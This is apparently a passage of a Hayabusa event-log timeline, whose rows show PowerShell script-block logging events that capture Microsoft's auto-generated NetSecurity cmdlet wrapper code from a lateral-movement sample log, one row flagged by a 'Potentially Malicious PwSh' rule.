[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 
+2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and 
(@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 
+2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) 
DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) 